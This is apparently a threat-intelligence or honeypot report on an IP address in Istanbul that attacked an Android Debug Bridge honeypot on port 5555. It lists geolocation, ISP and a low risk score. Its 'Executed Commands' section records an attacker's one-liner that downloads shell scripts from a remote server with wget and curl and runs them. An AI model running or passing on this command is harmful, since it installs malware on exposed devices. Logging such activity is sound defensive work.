TROYANOSYVIRUS
Active ThreatLOW

203.202.232.178

Country of Origin🇹🇷 Turkey
First Detection4/28/2026
Last Activity4/28/2026
ISPFiba Cloud Operation Company, LLC
🎯
3
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
0
Malware

Geolocation

Country
🇹🇷 Turkey
City
Istanbul
ASN
AS44382
ISP
Fiba Cloud Operation Company, LLC

Attack Types

adb_honeypot

Attacked Ports

5555

Associated Malware

No associated malware

Executed Commands

$cd /data/local/tmp/; busybox wget http://103.83.87.122/w.sh; sh w.sh; curl http://103.83.87.122/c.sh; sh c.sh; wget http://103.83.87.122/wget.sh; sh wget.sh; curl http://103.83.87.122/wget.sh; sh wget.sh; busybox wget http://103.83.87.122/wget.sh; sh wget.sh; busybox curl http://103.83.87.122/wget.sh; sh wget.sh1x

Risk Assessment

10
/100
LowMediumHighCritical